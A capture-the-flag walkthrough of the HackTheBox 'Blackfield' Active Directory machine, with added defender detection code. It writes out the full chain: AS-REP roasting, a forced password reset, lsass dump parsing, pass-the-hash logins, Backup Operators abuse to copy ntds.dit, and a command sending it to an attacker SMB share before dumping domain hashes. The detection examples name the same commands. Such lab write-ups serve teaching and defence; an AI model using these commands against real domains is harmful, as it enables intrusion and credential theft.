BLACKFIELD – HACKTHEBOX

This is the Write-up/Walkthrough of the BLACKFIELD Active Directory Machine from Hackthebox.

NMAP SCAN:

53/tcp   open  domain        syn-ack Simple DNS Plus
88/tcp   open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2023-08-12 00:47:22Z)
135/tcp  open  msrpc         syn-ack Microsoft Windows RPC
389/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds? syn-ack
593/tcp  open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
3268/tcp open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Domain: BLACKFIELD.LOCAL, NetBIOS name: DC01

Shares found on SMB:

smbclient -L 10.10.10.192
        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        forensic        Disk      Forensic / Audit share.
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share
        profiles$       Disk
        SYSVOL          Disk      Logon server share

Connecting to the profiles$ share showed a long list of empty directories, each named after a user. I copied the whole listing into a file named users.txt and extracted the names with awk.

awk '{print $1}' users.txt > usernames.txt

With that list of usernames, I checked for accounts that do not require Kerberos pre-authentication using impacket's GetNPUsers, and it returned the AS-REP hash of the user support.

impacket-GetNPUsers blackfield.local/ -dc-ip 10.10.10.192 -usersfile usernames.txt -format hashcat -outputfile result.hash

That gave the hash of the support user, which I cracked with john and the rockyou.txt wordlist.
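The AS-REP roasting step above works because the support account has Kerberos pre-authentication disabled. The following is an added example (not from the original write-up) showing, from the defender's side, how that setting looks in the account's userAccountControl attribute and how the activity shows up in Security event 4768 records; all account names, IPs and event values are constructed sample data.

```python
"""Added example (not from the original write-up): defender-side checks for
the AS-REP roasting step above: (1) the vulnerable setting as it appears in
LDAP, the DONT_REQ_PREAUTH bit (0x400000) of userAccountControl that
GetNPUsers keys on; (2) detection over constructed Security event 4768
records. Names, IPs and values below are constructed sample data.
"""
from collections import defaultdict

DONT_REQ_PREAUTH = 0x400000   # ADS_UF_DONT_REQUIRE_PREAUTH flag in userAccountControl

def roastable_accounts(users):
    """Names whose userAccountControl has DONT_REQ_PREAUTH set (the fix is to clear it)."""
    return sorted(n for n, uac in users.items() if uac & DONT_REQ_PREAUTH)

def flag_asrep_roast(events, min_distinct_accounts=3):
    """A successful TGT (4768) with PreAuthType 0 and RC4 (0x17) is a roasted
    account; one source failing against many distinct names (0x19/0x6) is the
    -usersfile enumeration that precedes it."""
    roasted, failures = set(), defaultdict(set)
    for e in events:
        if e["EventID"] != 4768:
            continue
        if (e["Status"] == "0x0" and e["PreAuthType"] == 0
                and e["TicketEncryptionType"] == 0x17):
            roasted.add(e["TargetUserName"])
        elif e["Status"] in ("0x19", "0x6"):   # PREAUTH_REQUIRED / C_PRINCIPAL_UNKNOWN
            failures[e["IpAddress"]].add(e["TargetUserName"])
    return {"roasted": sorted(roasted),
            "enumerating_sources": sorted(ip for ip, names in failures.items()
                                          if len(names) >= min_distinct_accounts)}

def _ev(user, ip, status, preauth=None, etype=0xFFFFFFFF):
    """One constructed 4768 record (failure audits carry no pre-auth type)."""
    return {"EventID": 4768, "TargetUserName": user, "IpAddress": ip,
            "Status": status, "PreAuthType": preauth, "TicketEncryptionType": etype}

# 0x410200 = NORMAL_ACCOUNT | DONT_EXPIRE_PASSWD | DONT_REQ_PREAUTH
SAMPLE_USERS = {"support": 0x410200, "audit2020": 0x10200, "svc_backup": 0x10200}

SAMPLE_EVENTS = [
    _ev("support", "10.10.14.5", "0x0", preauth=0, etype=0x17),    # the roast itself
    _ev("audit2020", "10.10.14.5", "0x19"),                         # wordlist probing
    _ev("svc_backup", "10.10.14.5", "0x19"),
    _ev("bob", "10.10.14.5", "0x6"),                                # non-existent name
    _ev("audit2020", "10.10.10.50", "0x0", preauth=2, etype=0x12),  # normal AES logon
    _ev("audit2020", "10.10.10.50", "0x19"),                        # one name only: ignored
]
```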

After that I used ldapsearch to enumerate further, but the long query output contained nothing useful, so I moved on.

Next, I used bloodhound.py to enumerate the domain with the credentials found so far:

/opt/BloodHound.py/bloodhound.py -u support -p '#00^BlackKnight' -d blackfield.local -v --zip -c All -ns 10.10.10.192

I started BloodHound, uploaded the zip file and queried the shortest path from owned principals to the user audit2020: the support user can reset the password of audit2020.

Looking up how to reset audit2020's password with that right, I found it can be done with rpcclient:

rpcclient -U support 10.10.10.192

Set the new password (setuserinfo2 with info level 23 sets the account's password):

rpcclient $> setuserinfo2 audit2020 23 hacker@1337

After that I tried connecting over WinRM with evil-winrm, but it did not work. Checking share access with the new credentials showed that audit2020 has access to the forensic share.

crackmapexec smb 10.10.10.192 -u audit2020 -p 'hacker@1337' --shares

Dump everything from the forensic share with smbclient:

$ smbclient //10.10.10.192/forensic -U audit2020%'hacker@1337'
smb: \> recurse on
smb: \> prompt off
smb: \> mget *

Looking through the files, I found memory dumps of several processes, and an article describing how to extract credentials from an lsass.DMP file.

Unzip lsass.zip (make sure the whole lsass.zip was downloaded, a partial file will not parse) and use pypykatz to extract the credentials from the dump:

pypykatz lsa minidump lsass.DMP

The pypykatz output contained the NTLM hash of the user svc_backup:

sid S-1-5-21-4194615774-2175524697-3563712290-1413
luid 406458
	== MSV ==
		Username: svc_backup
		Domain: BLACKFIELD
		LM: NA
		NT: 9658d1d1dcd9250115e2205d9f48400d

		SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c
		DPAPI: a03cd8e9d30171f3cfe8caad92fef621
	== WDIGEST [633ba]==
		username svc_backup
		domainname BLACKFIELD
		password None
		password (hex)

With the NT hash of svc_backup, I logged in with evil-winrm using pass-the-hash and got the user flag.

evil-winrm -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d -i 10.10.10.192

The svc_backup user is a member of the "Backup Operators" group, which grants SeBackupPrivilege and SeRestorePrivilege: the user can read and write any file on the system regardless of its ACL, which on a domain controller includes the NTDS database.

net user svc_backup /domain
whoami /all
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

Create a diskshadow script file (kunal.dsh) containing the commands diskshadow will run: take a persistent shadow copy of C: and expose it as drive Z:.

set context persistent nowriters
add volume c: alias kunal
create
expose %kunal% z:

Convert the .dsh file to DOS (CRLF) line endings, which diskshadow expects:

unix2dos kunal.dsh

Then upload the file with evil-winrm's upload function and run diskshadow with the script, which snapshots the C: drive and exposes the copy as the Z: drive defined in the script:

diskshadow /s kunal.dsh

diskshadow reported the shadow copy of C: exposed as Z:. Next, copy ntds.dit out of the snapshot with robocopy in backup mode (/B), which uses SeBackupPrivilege to bypass the file's ACL:

robocopy /B Z:\Windows\NTDS . ntds.dit

I then tried to download ntds.dit with evil-winrm's download function, but it kept failing, so I started an SMB server with impacket-smbserver and copied ntds.dit over to my Linux machine.

Start the SMB server on Linux (share name "share", serving the current directory):

impacket-smbserver -smb2support share .

Copy the ntds.dit file from the target to the share:

copy ntds.dit \\YOUR-TUNNEL-IP\share\ntds.dit

To decrypt the hashes in ntds.dit, impacket's secretsdump also needs the SYSTEM hive (it holds the boot key that protects the NTDS secrets), so save it from the registry:

reg save hklm\system system.hive

Download system.hive to the Linux machine as well, then run secretsdump:

impacket-secretsdump -ntds ntds.dit -system system.hive local
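The Backup Operators chain above (diskshadow script, robocopy /B, reg save, copy of ntds.dit to a share) leaves a distinctive trail in process-creation auditing. The following is an added example (not part of the original write-up) of detection logic over constructed Security event 4688 records; the logon ids, user names and command lines are constructed sample data, and the rule that matters is several steps from one logon session, since any single command is also used legitimately.

```python
"""Added example (not part of the original write-up): detection logic for the
Backup Operators chain above, run over constructed Security 4688 (process
creation) records. Each rule matches one step: diskshadow driven by a script,
robocopy in backup mode (/B) reaching into NTDS, reg.exe saving the SYSTEM
hive, and ntds.dit copied to a UNC path. One hit alone is noisy (admins run
diskshadow and robocopy); the same logon session hitting several rules is
the signal. Logon ids, users and command lines below are constructed.
"""
import re
from collections import defaultdict

RULES = {
    "diskshadow_script": re.compile(r"diskshadow(\.exe)?\s+/s\s", re.I),
    "robocopy_backup_ntds": re.compile(r"robocopy.*\s/b\s.*ntds", re.I),
    "reg_save_system": re.compile(r"reg(\.exe)?\s+save\s+hklm\\system", re.I),
    "ntds_to_unc": re.compile(r"ntds\.dit.*\\\\[^\\\s]+\\", re.I),
}

def classify(cmdline):
    """Names of the rules a single 4688 command line matches."""
    return [name for name, rx in RULES.items() if rx.search(cmdline)]

def correlate(events, min_rules=2):
    """Group rule hits by SubjectLogonId; keep sessions matching >= min_rules."""
    by_logon = defaultdict(set)
    for e in events:
        if e["EventID"] == 4688:
            by_logon[e["SubjectLogonId"]].update(classify(e["CommandLine"]))
    return {lid: sorted(hits) for lid, hits in by_logon.items()
            if len(hits) >= min_rules}

# Constructed sample: one session walking the whole chain, one doing routine work.
SAMPLE_EVENTS = [
    {"EventID": 4688, "SubjectLogonId": "0x3e7a1", "SubjectUserName": "svc_backup",
     "CommandLine": r"diskshadow /s kunal.dsh"},
    {"EventID": 4688, "SubjectLogonId": "0x3e7a1", "SubjectUserName": "svc_backup",
     "CommandLine": r"robocopy /B Z:\Windows\NTDS . ntds.dit"},
    {"EventID": 4688, "SubjectLogonId": "0x3e7a1", "SubjectUserName": "svc_backup",
     "CommandLine": r"reg save hklm\system system.hive"},
    {"EventID": 4688, "SubjectLogonId": "0x3e7a1", "SubjectUserName": "svc_backup",
     "CommandLine": r"copy ntds.dit \\10.10.14.5\share\ntds.dit"},
    {"EventID": 4688, "SubjectLogonId": "0x1d2b", "SubjectUserName": "opsadmin",
     "CommandLine": r"robocopy C:\data D:\backup /E"},
    {"EventID": 4688, "SubjectLogonId": "0x1d2b", "SubjectUserName": "opsadmin",
     "CommandLine": r"reg query hklm\software"},
]
```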

With the administrator's hash from secretsdump, I connected to the administrator account with evil-winrm using pass-the-hash:

evil-winrm -u administrator -H "184fb5e5178480be64824d4cd53b99ee" -i 10.10.10.192

If you face any problems, let me know in the comments.
